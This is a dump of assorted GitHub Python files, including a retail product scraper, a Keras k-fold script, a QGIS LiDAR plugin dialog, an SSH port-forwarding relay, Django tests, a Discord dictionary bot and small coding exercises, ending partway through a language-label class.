https://www.assembla.com/spaces/competitormonitor/tickets/4584-powerhouse-fitness-|-superstore-|-new-spider/details#\n\n\"\"\"\n\nimport re\n\nfrom datetime import datetime\nfrom scrapy.spider import BaseSpider\nfrom scrapy.http import Request\nfrom copy import deepcopy\n\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.utils.url import urljoin_rfc\nfrom product_spiders.items import (Product, ProductLoaderWithNameStrip as ProductLoader)\nfrom scrapy.contrib.loader.processor import MapCompose, Join, TakeFirst, Identity\nfrom scrapy.contrib.loader import XPathItemLoader\nfrom scrapy.utils.markup import remove_entities\nfrom product_spiders.utils import extract_price\nimport logging\n\n\nclass ArgosCoUKKeterSpider(BaseSpider):\n name = 'powerhouse_fitness-fitness-superstore.co.uk'\n allowed_domains = ['fitness-superstore.co.uk']\n start_urls = ['http://www.fitness-superstore.co.uk/']\n \n custom_settings = {'COOKIES_ENABLED': False}\n\n def parse(self, response):\n categories = response.xpath('//ul[@id=\"nav\"]//a/@href').extract()\n for url in categories:\n yield Request(response.urljoin(url))\n\n sub_categories = response.xpath('//div[contains(@class, \"sub-cat-block\")]/a/@href').extract()\n for url in sub_categories:\n yield Request(response.urljoin(url))\n\n pages = response.xpath('//div[@class=\"pages\"]//li/a/@href').extract()\n for url in pages:\n yield Request(response.urljoin(url))\n\n products = response.xpath('//div[@class=\"product-item__name\"]//a/@href').extract()\n if products:\n category_names = response.xpath('//div[@class=\"breadcrumbs\"]//li/a/text()').extract()\n category_names += 
response.xpath('//div[@class=\"breadcrumbs\"]//li/strong/text()').extract()\n category_names = ' > '.join(category_names[1:])\n for url in products:\n yield Request(response.urljoin(url), callback=self.parse_product, meta={'category': category_names})\n\n identifier = response.xpath('//input[@id=\"entity_id\"]/@value').extract()\n if identifier:\n for product in self.parse_product(response):\n yield product\n\n def parse_product(self, response):\n url = response.url\n\n l = ProductLoader(item=Product(), response=response)\n\n name = response.xpath('//span[@itemprop=\"name\"]/text()').extract()\n try:\n name = name[0].strip()\n except IndexError:\n retry = response.meta.get('retry', 0)\n if retry <= 3:\n yield Request(response.url, dont_filter=True, callback=self.parse_product, meta={'retry': retry + 1})\n\n l.add_value('name', name)\n\n price = response.xpath('//p[@class=\"special-price\"]/span[@class=\"price\"]/text()').extract()\n if price:\n price = price[0]\n else:\n price = response.xpath('//span[@class=\"regular-price\"]/span[@class=\"price\"]/text()').extract()\n if price:\n price = price[0]\n l.add_value('price', price)\n\n sku = response.xpath('//div[@class=\"product-shop--sku\"]/h4/span/text()').extract()\n l.add_value('sku', sku[0])\n \n identifier = response.css('div.nosto_product span.product_id::text').extract() or response.xpath('//input[@id=\"entity_id\"]/@value').extract()\n l.add_value('identifier', identifier[0])\n\n l.add_value('category', response.meta.get('category', ''))\n\n image_url = response.xpath('//span[@class=\"image_url\"]/text()').extract()\n l.add_value('image_url', image_url)\n l.add_value('url', url)\n l.add_xpath('brand', '//span[@class=\"brand\"]/text()')\n \n out_of_stock = response.xpath('//div[contains(@class, \"availability-box\")]/p[contains(@class, \"out-of-stock\")]')\n if out_of_stock:\n l.add_value('stock', 0)\n\n item = l.load_item()\n\n options = response.xpath('//table[@id=\"super-product-table\"]/tbody/tr')\n if options:\n for option in options:\n option_item = deepcopy(item)\n option_item['name'] = option.xpath('td[1]/text()').extract()[0]\n price = option.xpath('td//span[@class=\"price\"]/text()').extract()\n price = extract_price(price[0]) if price else 0\n option_item['price'] = price\n identifier = option.xpath('td//input/@name').re('\\[(.*)\\]')\n if not identifier:\n identifier = option.xpath('td//span/@id').re('product-price-(.*)')\n option_item['stock'] = 0\n\n option_item['identifier'] += '-' + identifier[0]\n yield option_item\n else:\n yield item\n\n\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/powerhouse_fitness/fitness_superstore.py","file_name":"fitness_superstore.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30129716817","text":"\"\"\"\r\n\n\nReplace the numbers in a string with their binary form.\n\n### Examples\n\n replace_nums(\"I have 2 sheep.\") ➞ \"I have 10 sheep.\"\n \n replace_nums(\"My father was born in 1974.10.25.\") ➞ \"My father was born in 11110110110.1010.11001.\"\n \n replace_nums(\"10hell76o4 boi\") ➞ \"1010hell1001100o100 boi\"\n\n### Notes\n\n * There are possibly two or more numbers in a single word (I do not recommend splitting the text at spaces, it surely won't help).\n * Anything separates two numbers, even spaces (\"2 2\" --> \"10 10\").\n\n\"\"\"\r\n\ndef replace_nums(string):\n newstring,num = \"\",\"\"\n for index,i in 
enumerate(string):\n        if not i.isdigit():\n            if num != \"\":\n                newstring += bin(int(num))[2:]\n                num = \"\"\n            newstring += i\n        else:num += i\n    # flush a trailing run of digits (e.g. \"2 2\" must become \"10 10\")\n    if num != \"\":\n        newstring += bin(int(num))[2:]\n    return newstring\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"kfwTnnJjo3SKG2pYx_2.py","file_name":"kfwTnnJjo3SKG2pYx_2.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9514431246","text":"from keras.datasets import boston_housing\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Dropout\n\n(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()\n\nprint(train_data.shape)\nprint(test_data.shape)\n\n# normalize using a ...Scaler\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nscaler = StandardScaler()\n# scaler = MinMaxScaler()\n\nscaler.fit(train_data)\ntrain_data = scaler.transform(train_data)\ntest_data = scaler.transform(test_data)\n\nfrom keras import models\nfrom keras import layers\n\ndef build_model():\n    # The same model will be created several times, so wrap it in a function.\n    model = models.Sequential()\n    model.add(layers.Dense(32, activation='relu', input_shape=(train_data.shape[1],)))\n    model.add(layers.Dense(64, activation='relu'))\n    model.add(layers.Dense(64, activation='relu'))\n    model.add(layers.Dense(64, activation='relu'))\n    model.add(layers.Dense(64, activation='relu'))\n    model.add(layers.Dense(1))\n    model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])\n    return model\n\nseed = 77\nfrom keras.wrappers.scikit_learn import KerasClassifier, KerasRegressor\nfrom sklearn.model_selection import KFold, cross_val_score\nmodel = KerasRegressor(build_fn=build_model, epochs=10,\n                       batch_size=1, verbose=1)\nkfold = KFold(n_splits=5, shuffle=True, random_state=seed)\nresults = cross_val_score(model, train_data, train_targets, cv=kfold) # cv == cross validation\n\nimport numpy as np\nprint(results)\nprint(np.mean(results))\n\n# 1. Refine with scikit-learn's KFold\n# 2. Apply normalization/standardization\n# 3. Reduce np.mean(all_scores) to 1 or below\n\n\n# from sklearn.model_selection import KFold\n# kf = KFold(n_splits=5)\n# for train_index, test_index in kf.split(train_data, train_targets):\n#     partial_train_data, val_data = train_data[train_index], train_data[test_index]\n#     partial_train_targets, val_targets = train_targets[train_index], train_targets[test_index]\n#     print(train_index, test_index)\n\n","repo_name":"jamiedotpro/etc","sub_path":"keras/keras31_kfold.py","file_name":"keras31_kfold.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9785322318","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n/***************************************************************************\r\n LiDARForestryHeight\r\n A QGIS plugin. 
LiDAR Forestry Height\r\n generates a DEM with the forest height,\r\n calculated from a classified LiDAR point\r\n cloud using LasPy Library\r\n\r\n Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/\r\n -------------------\r\n begin : 2018-09-24\r\n copyright : (C) 2019 by PANOimagen S.L.\r\n email : info@panoimagen.com\r\n git sha : $Format:%H$\r\n ***************************************************************************/\r\n\r\n/***************************************************************************\r\n * *\r\n * This program is free software; you can redistribute it and/or modify *\r\n * it under the terms of the GNU General Public License as published by *\r\n * the Free Software Foundation; either version 2 of the License, or *\r\n * (at your option) any later version. *\r\n * *\r\n ***************************************************************************/\r\n\"\"\"\r\nfrom __future__ import unicode_literals\r\nimport os\r\n\r\nfrom qgis.PyQt import uic\r\nfrom qgis.PyQt import QtWidgets\r\n\r\nimport logging\r\nlogger = logging.getLogger(\"lfh\")\r\nlogger.setLevel(logging.DEBUG)\r\n\r\nfrom qgis.core import Qgis, QgsRasterLayer, QgsProject\r\nfrom qgis.gui import QgisInterface, QgsMessageBar\r\n\r\nfrom .lfh_errors import LasPyNotFoundError\r\n\r\ntry:\r\n from . import plugin_process\r\n LASPY_INSTALLED = True\r\nexcept LasPyNotFoundError as e:\r\n LASPY_INSTALLED = False\r\n \r\nfrom. import files_paths_funs as dir_fns\r\n\r\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\r\n os.path.dirname(__file__), 'LiDARForestryHeight_dialog_base.ui'))\r\n\r\n\r\nclass LiDARForestryHeightDialog(QtWidgets.QDialog, FORM_CLASS):\r\n def __init__(self, parent=None):\r\n \"\"\"Constructor.\"\"\"\r\n super(LiDARForestryHeightDialog, self).__init__(parent)\r\n # Set up the user interface from Designer.\r\n # After setupUI you can access any designer object by doing\r\n # self., and you can use autoconnect slots - see\r\n # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\r\n # #widgets-and-dialogs-with-auto-connect\r\n self.setupUi(self)\r\n self._initUi()\r\n self.iface = QgisInterface\r\n self.buttonBox.accepted.connect(self.accept)\r\n self.buttonBox.accepted.connect(self.preparingProcess)\r\n self.buttonBox.rejected.connect(self.reject)\r\n\r\n self.addResultsCheckBox.setChecked(True)\r\n self.createAndLoadIntermCheckBox.setChecked(False)\r\n\r\n self.outputFolderToolButton.clicked.connect(self.setOutPath)\r\n self.inputToolButton.clicked.connect(self.inputLiDAR)\r\n\r\n def _initUi(self):\r\n from . import version_number\r\n version = version_number.get_version_from_metadata()\r\n self.versionLabel.setText(u'Version: {}'.format(version))\r\n\r\n if LASPY_INSTALLED:\r\n text = u'LasPy Library avaible'\r\n color = u'color: black'\r\n else:\r\n text = (u'LasPy Library is not installed. 
Visit' +\r\n u' plugin homepage or LasPy documentation')\r\n color = u'color: red'\r\n\r\n self.lasPyInstalledLabel.setText(text)\r\n self.lasPyInstalledLabel.setStyleSheet(color)\r\n\r\n interpolate_methods = ['nearest', 'linear', 'cubic']\r\n self.interpolatingMethodComboBox.addItems(interpolate_methods)\r\n\r\n self.updateUi()\r\n\r\n def updateUi(self):\r\n \"\"\" Enable/disable UI options if LasPy Library is/isn't installed\r\n \"\"\"\r\n self.pluginGroupBox.setEnabled(LASPY_INSTALLED)\r\n self.inputGroupBox.setEnabled(LASPY_INSTALLED)\r\n self.resultsParamsGroupBox.setEnabled(LASPY_INSTALLED)\r\n\r\n def inputLiDAR(self):\r\n fileNames = QtWidgets.QFileDialog.getOpenFileNames(self,\r\n u\"Select the input LiDAR classified file/s\",\r\n self.inputLineEdit.text(),\r\n (\"LiDAR files (*.laz *.LAZ* *.las *.LAS);;\" +\r\n \" All files (*)\"))\r\n if fileNames:\r\n # quoted = ['\"{}\"'.format(fn) for fn in fileNames]\r\n self.inputLineEdit.setText(\", \".join(fileNames[0]))\r\n if not self.outputFolderLineEdit.text():\r\n try:\r\n outPath = os.path.join(\r\n os.path.split(os.path.abspath(fileNames[0][0]))[0],\r\n u'lidar_forestry_height_output')\r\n self.outputFolderLineEdit.setText(outPath)\r\n except IndexError:\r\n pass\r\n\r\n def setOutPath(self):\r\n \"\"\"Function to select the output folder and update the LineEdit\r\n \"\"\"\r\n outPath = QtWidgets.QFileDialog.getExistingDirectory(self,\r\n u\"Select the output folder\",\r\n self.outputFolderToolButton.text())\r\n if outPath:\r\n self.outputFolderLineEdit.setText(os.path.join(\r\n outPath, u'lidar_forestry_height_output'))\r\n\r\n def preparingProcess(self):\r\n\r\n if not LASPY_INSTALLED:\r\n self.showQMessage(u\"Error: LasPy Library is not installed!\" +\r\n u\"\\nPlease, solve it. More information\" +\r\n u\" at plugin homepage.\")\r\n return\r\n\r\n filenames = self.inputLineEdit.text()\r\n\r\n if not filenames:\r\n self.showQMessage(u\"Error: Not input file selected!\\nPlease,\" +\r\n u\" select one.\")\r\n\r\n outPath = self.outputFolderLineEdit.text()\r\n\r\n if not outPath:\r\n self.showQMessage(u\"Error: Not output folder selected!\\n\" +\r\n u\"Please, select one.\")\r\n\r\n if filenames and outPath:\r\n for f in filenames.split(\",\"):\r\n full_filename = f.strip()\r\n _, filename = os.path.split(full_filename)\r\n if outPath:\r\n self.settingProcessParams(full_filename, outPath)\r\n\r\n def settingProcessParams(self, full_filename, outPath):\r\n\r\n self.pixel_size = self.pixelSizeDoubleSpinBox.value()\r\n self.inter_method = self.interpolatingMethodComboBox.currentText()\r\n self.load_result = self.addResultsCheckBox.isChecked()\r\n self.partials_create_load = self.createAndLoadIntermCheckBox.isChecked()\r\n\r\n _, filename = os.path.split(full_filename)\r\n base_name, ext = os.path.splitext(filename)\r\n start_index = 1\r\n out_path = os.path.join(\r\n outPath, (base_name + '_r' + str(start_index)))\r\n\r\n if os.path.exists(out_path):\r\n import glob\r\n key_for_glob = os.path.join(outPath, (base_name + '_r*' ))\r\n dirs_list = glob.glob(key_for_glob)\r\n indexes = []\r\n for directory in dirs_list:\r\n try:\r\n fn_index = int(directory[-3:])\r\n except ValueError:\r\n try:\r\n fn_index = int(directory[-2:])\r\n except ValueError:\r\n fn_index = int(directory[-1])\r\n indexes.append(fn_index)\r\n max_index = max(indexes)\r\n next_index = max_index + 1\r\n out_path = os.path.join(outPath,\r\n (base_name + '_r' + str(next_index)))\r\n\r\n self.dir_fns = dir_fns.DirAndPaths(filename, out_path)\r\n\r\n 
self.showMessage(u'Starting processing LiDAR data {}'.format(base_name),\r\n Qgis.MessageLevel(0))\r\n\r\n try:\r\n self.process = plugin_process.Process(full_filename,\r\n out_path,\r\n self.pixel_size,\r\n self.inter_method,\r\n self.partials_create_load)\r\n\r\n except (ValueError, OSError) as message:\r\n self.showQMessage(str(message))\r\n self.showMessage('LiDAR Forestry Height stopped process',\r\n Qgis.MessageLevel(1))\r\n return\r\n\r\n if self.partials_create_load:\r\n self.load_raster_layer(self.process.dirs.out_paths['dtm'])\r\n self.load_raster_layer(self.process.dirs.out_paths['dsm'])\r\n\r\n if self.load_result:\r\n self.load_raster_layer(self.process.dirs.out_paths['height'])\r\n\r\n def load_raster_layer(self, raster_full_path):\r\n \"\"\"Add the result to canvas.\r\n \"\"\"\r\n raster_filename, _ = os.path.splitext(os.path.split(raster_full_path)[-1])\r\n rlayer = QgsRasterLayer(raster_full_path,\r\n raster_filename)\r\n QgsProject.instance().addMapLayer(rlayer)\r\n\r\n def showMessage(self, message, msg_level):\r\n \"\"\"This function shows a QGIS message bar when is called with the\r\n message and the message Level -i.e.:INFO-\r\n \"\"\"\r\n QgsMessageBar().pushMessage(\r\n message, level=msg_level)\r\n\r\n def showQMessage(self, message, msg_level = \"Error message\"):\r\n \"\"\"This function shows a Qt message dialog when is called with the\r\n message and the message Level-\r\n \"\"\"\r\n QtWidgets.QMessageBox.warning(self, msg_level, message)\r\n","repo_name":"PANOimagen/LiDARForestryHeight","sub_path":"LiDARForestryHeight_dialog.py","file_name":"LiDARForestryHeight_dialog.py","file_ext":"py","file_size_in_byte":9692,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"32"} +{"seq_id":"41455835479","text":"import os\n\nimport synapse.dyndeps as s_dyndeps\nimport synapse.lib.socket as s_socket\n\nfrom synapse.links.common import *\n\nparamiko = s_dyndeps.getDynMod('paramiko')\n\nclass SshRelay(LinkRelay):\n '''\n Implements the SSH link protocol for synapse.\n\n ssh://[user[:passwd]@][:port]/?forward=[&keyfile=]\n\n '''\n proto = 'ssh'\n\n def _reqValidLink(self):\n\n if paramiko is None:\n raise Exception('paramiko module not installed')\n\n if self.link[1].get('port') is None:\n self.link[1]['port'] = 22\n\n host = self.link[1].get('host')\n if host is None:\n raise s_common.PropNotFound('host')\n\n fwdstr = self.link[1].get('forward')\n if fwdstr is None:\n raise s_common.PropNotFound('forward=')\n\n keyfile = self.link[1].get('keyfile')\n if keyfile is not None and not os.path.isfile(keyfile):\n raise Exception('keyfile not found: %s' % (keyfile,))\n\n fwdhost, fwdport = fwdstr.split(':')\n try:\n fwdport = int(fwdport, 0)\n except ValueError as e:\n raise Exception('Bad Forward Port: %r' % (fwdport,))\n\n self.link[1]['fwdhost'] = fwdhost\n self.link[1]['fwdport'] = fwdport\n\n def _listen(self):\n raise Exception('Synapse Link: SSH Listen Not Supported (yet)')\n\n def _connect(self):\n\n host = self.link[1].get('host')\n user = self.link[1].get('user')\n port = self.link[1].get('port')\n passwd = self.link[1].get('passwd')\n keyfile = self.link[1].get('keyfile')\n timeout = self.link[1].get('timeout')\n\n try:\n\n ssh = paramiko.client.SSHClient()\n ssh.load_system_host_keys()\n\n ssh.connect(host, port=port, username=user, password=passwd, key_filename=keyfile, timeout=timeout, allow_agent=True)\n\n trns = ssh.get_transport()\n\n fwdhost = self.link[1].get('fwdhost')\n fwdport = self.link[1].get('fwdport')\n\n s = 
trns.open_channel('direct-tcpip', (fwdhost, fwdport), ('127.0.0.1', 0))\n\n return s_socket.Socket(s, ssh=ssh)\n\n except s_common.sockerrs as e:\n raiseSockError(self.link, e)\n\n except Exception as e:\n ssh.close()\n raise\n","repo_name":"larrycameron80/synapse","sub_path":"synapse/links/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"34277393028","text":"from django.test import TestCase,Client\r\nimport packing\r\nimport json\r\n# from login import func\r\n\r\n# Create your tests here.\r\nclass func_testcase(TestCase):\r\n def setUp(self):\r\n packing.loaddata()\r\n self.appname = 'conf'\r\n self.tablename = 'ConfExaminationItem'\r\n self.c = Client()\r\n\r\n def test_func_impl_loadattrs(self):\r\n # packing.loaddata()\r\n\r\n c = self.c\r\n # appname = 'conf'\r\n # tablename = 'ConfExaminationItem'\r\n\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename}\r\n response = c.post('/impl/loadattrs',data=data)\r\n\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadattrs',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_impl_loadall(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename}\r\n response = c.post('/impl/loadall',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadall',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_impl_loadfilter(self):\r\n # packing.loaddata()\r\n c = self.c\r\n\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename,\r\n 'condition':json.dumps({\r\n 'id':1\r\n }),\r\n }\r\n response = c.post('/impl/loadfilter',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadfilter',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_cmpl_loadfilter(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {\r\n 'tablelist':json.dumps(['conf.ConfExaminationItem', 'conf.ConfExaminationPlot']),\r\n 'condition':json.dumps({'id':2})\r\n }\r\n response = c.post('/cmpl/loadfilter',data=data)\r\n self.assertEqual(response.status_code, 200)\r\n # print ('test func cmpl loadfilter: ', str(response.content, encoding='utf-8'))\r\n\r\n def test_func_impl_loadone(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename,\r\n 'itemid':1}\r\n response = c.post('/impl/loadone',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadone',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_impl_saveobj(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {\r\n 'appname':self.appname,\r\n 'tablename':self.tablename,\r\n 'obj':json.dumps({\r\n 'item_name':'test_item_name',\r\n 'item_type':'工作考核',\r\n 'score_total':10000.0,\r\n 'score_default':0,\r\n 'score_top_limit':10000.0,\r\n 'score_bottom_limit':0,\r\n 'item_count_limit':0,\r\n }),\r\n }\r\n response = c.post('/impl/saveobj',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_saveobj',str(response.content,encoding='utf-8'))\r\n\r\n\r\n\r\n\r\nfrom login import func\r\nclass func_load_test(TestCase):\r\n def setUp(self):\r\n pass\r\n def test_func_impl_loadmodels(self):\r\n data = {\r\n 'appname':'conf',\r\n }\r\n\r\n res = func.loadtables(**data)\r\n self.assertListEqual(res, ['ConfExaminationItem', 
'ConfExaminationPlot'])\r\n\r\n\r\n","repo_name":"MrLi008/py_django_implement","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2712750021","text":"#including required modules to the program\r\nimport os\r\nimport requests\r\nimport json\r\nimport discord\r\nimport datetime\r\n\r\nfrom dotenv import load_dotenv\r\n\r\nload_dotenv()\r\nTOKEN = os.getenv('DISCORD_TOKEN')\r\n\r\nclient = discord.Client()\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(f'{client.user.name} has connected to Discord!')\r\n\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n await member.create_dm()\r\n await member.dm_channel.send(f'Hi {member.name}, welcome to my Discord server!')\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.author == client.user:\r\n return\r\n\r\n msg = message.content\r\n\r\n if msg == '$help':\r\n embedv = discord.Embed(title='Dicti\\'s walkthrough', \r\n color=0xFF5733,\r\n timestamp=datetime.datetime.utcnow())\r\n\r\n embedv.set_thumbnail(url = 'https://i.imgur.com/emVAdxH.jpg')\r\n\r\n embedv.add_field(name = '`$help`',\r\n value = 'Displays the list of commands supported by Dicti and the specific syntax need for the usage',\r\n inline = False)\r\n\r\n embedv.add_field(name = '`$dict `',\r\n value = 'Displays information on the word used involving parameters such as definitions, synonyms, phonetics, etc.',\r\n inline = False)\r\n\r\n embedv.add_field(name = '`$urban `',\r\n value = 'Displays information regarding the colloquial use of the word and the its different meanings under different contexts',\r\n inline = False)\r\n\r\n await message.channel.send(embed = embedv)\r\n\r\n # if msg.startswith('$urban'):\r\n # word = msg.split('$urban ', 1)[1]\r\n\r\n # response = requests.get(\"https://api.urbandictionary.com/v0/define?term=\" + word)\r\n # json_data = json.loads(response.text)\r\n\r\n # deflist = json_data['list']\r\n # n = len(deflist)\r\n\r\n # if n > 0:\r\n # deflist = sorted(deflist, key = lambda x: x['thumbs_up'], reverse = True)\r\n # n = min(5, n)\r\n\r\n # page = []\r\n\r\n\r\n\r\n\r\n\r\n \r\n # else:\r\n # noword = 'No meanings found'\r\n # await message.channel.send(noword)\r\n\r\n if msg.startswith('$dict'):\r\n word = msg.split('$dict ', 1)[1]\r\n\r\n response = requests.get(\"https://api.dictionaryapi.dev/api/v2/entries/en/\" + word)\r\n json_data = json.loads(response.text)\r\n\r\n if type(json_data) == list:\r\n n = len(json_data)\r\n\r\n page = []\r\n \r\n for i in range(n):\r\n embedv = discord.Embed(title = 'Dictionary ('+str(i+1)+'/'+str(n)+')', \r\n description = json_data[i]['word'].title(), \r\n color=0xFF5733,\r\n timestamp=datetime.datetime.utcnow()) \r\n\r\n embedv.add_field(name = '\\u200b', \r\n value = '**Origin: **'+json_data[i]['origin'] +'\\n' + '**Parts of Speech: **'+json_data[i]['meanings'][0]['partOfSpeech'],\r\n inline = False)\r\n\r\n embedv.add_field(name = '\\u200b',\r\n value = '\\u200b', \r\n inline = False)\r\n\r\n embedv.add_field(name = 'Phonetics',\r\n value = 'Text: '+json_data[i]['phonetics'][0]['text'] + '\\n' + 'Audio: '+json_data[i]['phonetics'][0]['audio'],\r\n inline = False)\r\n\r\n embedv.add_field(name = '\\u200b',\r\n value = '\\u200b', \r\n inline = False)\r\n\r\n defs = json_data[i]['meanings'][0]['definitions']\r\n\r\n for j in range(len(defs)):\r\n x = len(defs[j]['synonyms'])\r\n y = len(defs[j]['antonyms'])\r\n\r\n if x > 0 and 
y > 0:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'] + '\\n' + 'Synonyms: ' + str(defs[j]['synonyms'][:min(x,5)]) + '\\n' + 'Antonyms: ' + str(defs[j]['antonyms'][:min(y,5)]), \r\n inline = False) \r\n elif x > 0 and y == 0:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'] + '\\n' + 'Synonyms: ' + str(defs[j]['synonyms'][:min(x,5)]), \r\n inline = False) \r\n elif x == 0 and y > 0:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'] + '\\n' + 'Antonyms: ' + str(defs[j]['antonyms'][:min(y,5)]), \r\n inline = False) \r\n else:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'], \r\n inline = False) \r\n\r\n embedv.add_field(name = '\\u200b',\r\n value = '\\u200b', \r\n inline = False) \r\n\r\n page.append(embedv)\r\n \r\n emb = await message.channel.send(embed = page[0])\r\n await emb.add_reaction(\"◀️\")\r\n await emb.add_reaction(\"▶️\")\r\n\r\n def check(reaction, user):\r\n return user == message.author\r\n\r\n k = 0 \r\n reaction = None\r\n\r\n while True:\r\n if str(reaction) == '◀️':\r\n if k > 0:\r\n k -= 1\r\n await emb.edit(embed = page[k])\r\n elif str(reaction) == '▶️':\r\n if k < n-1:\r\n k += 1\r\n await emb.edit(embed = page[k])\r\n\r\n try:\r\n reaction, user = await client.wait_for('reaction_add', timeout = 30.0, check = check)\r\n await emb.remove_reaction(reaction, user)\r\n except:\r\n break\r\n \r\n else:\r\n noword = json_data['title']\r\n await message.channel.send(noword)\r\n\r\nclient.run(TOKEN)","repo_name":"MistaAsh/Dicti-bot","sub_path":"dicti.py","file_name":"dicti.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"781394489","text":"from threading import Thread\r\nfrom random import choice\r\nimport time\r\n\r\nauthor = 'Jencent Dizon'\r\nlink = 'https://github.com/I-am-Programmer-101'\r\nprint(\"Author:\",author,\"\\nLink:\",link)\r\n\r\ndata = [90,81,78,95,79,72,85]\r\n\r\nclass MyThread(Thread):\r\n \r\n def __init__(self, val):\r\n # Costructor\r\n Thread.__init__(self)\r\n self.val = val\r\n \r\n \r\n def run(self):\r\n for i in range(1):\r\n time.sleep(2)\r\n print('Average Value:',choice(data),'in %s' % (self.getName()))\r\n print('Maximum Value:',choice(data),'in %s' % (self.getName()))\r\n print('Minimum Value:',choice(data),'in %s' % (self.getName()))\r\n\r\n \r\n \r\n# Run following code when the program starts\r\nif __name__ == '__main__':\r\n print('Thread Starting...')\r\n # Declare objects of MyThread class\r\n myThreadOb1 = MyThread(3)\r\n myThreadOb1.setName('Thread 1')\r\n \r\n myThreadOb2 = MyThread(3)\r\n myThreadOb2.setName('Thread 2')\r\n\r\n myThreadOb3 = MyThread(3)\r\n myThreadOb3.setName('Thread 3')\r\n \r\n # Start running the threads!\r\n myThreadOb1.start()\r\n myThreadOb2.start()\r\n myThreadOb3.start()\r\n\r\n # Wait for the threads to finish...\r\n myThreadOb1.join()\r\n myThreadOb2.join()\r\n myThreadOb3.join()\r\n\r\n print('Thread Terminating...')\r\n","repo_name":"jencent101/Threading","sub_path":"threading.py","file_name":"threading.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"2307143748","text":"#User function Template for python3\n\n'''\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n'''\n\ndef reverseDLL(head):\n if 
not head or not head.next :\n return head\n prev = None\n cur = head\n while cur :\n tmp = cur.next\n cur.next = prev\n cur.prev = tmp\n prev = cur\n cur = tmp\n return prev\n\n\n\n# Driver code Starts\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n\nclass DoublyLinkedList:\n def __init__(self):\n self.head = None\n\n def push(self, new_data,tail):\n if not self.head:\n self.head=Node(new_data)\n return self.head\n Nnode=Node(new_data)\n Nnode.prev=tail\n tail.next=Nnode\n return Nnode\n\n def printList(self, node):\n while(node is not None):\n print (node.data,end=' ')\n node = node.next\n\n\n\nif __name__ == '__main__':\n t=int(input())\n\n for tcs in range(t):\n n=int(input())\n arr=[int(x) for x in input().split()]\n\n\n dll=DoublyLinkedList()\n tail=None\n\n for e in arr:\n tail=dll.push(e,tail)\n\n resHead=reverseDLL(dll.head)\n dll.printList(resHead)\n print()\n\n# Driver Code Ends\n","repo_name":"VbhvGupta/workspace","sub_path":"GFG/ReverseDLL.py","file_name":"ReverseDLL.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24202807630","text":"# -*- coding: utf-8 -*-\r\nclass LanguageObject(object):\r\n \r\n lang= None\r\n langDefault = None\r\n def __init__(self):\r\n pass\r\n \r\n @classmethod\r\n def setLanguage(cls,lang):\r\n \r\n cls.lang = []\r\n cls.langDefault = {}\r\n for l in lang:\r\n language = Language(id_language_label= l.id_language_label,\r\n module= l.module,\r\n default_label= l.default_label,\r\n message_en= l.message_en,\r\n message_th= l.message_th\r\n )\r\n cls.lang.append( language)\r\n cls.langDefault[l.default_label] = language\r\n \r\n @classmethod\r\n def getLanguage(cls):\r\n return cls.lang\r\n \r\n @classmethod\r\n def getdata(cls,key,lang='EN'):\r\n if (cls.langDefault is not 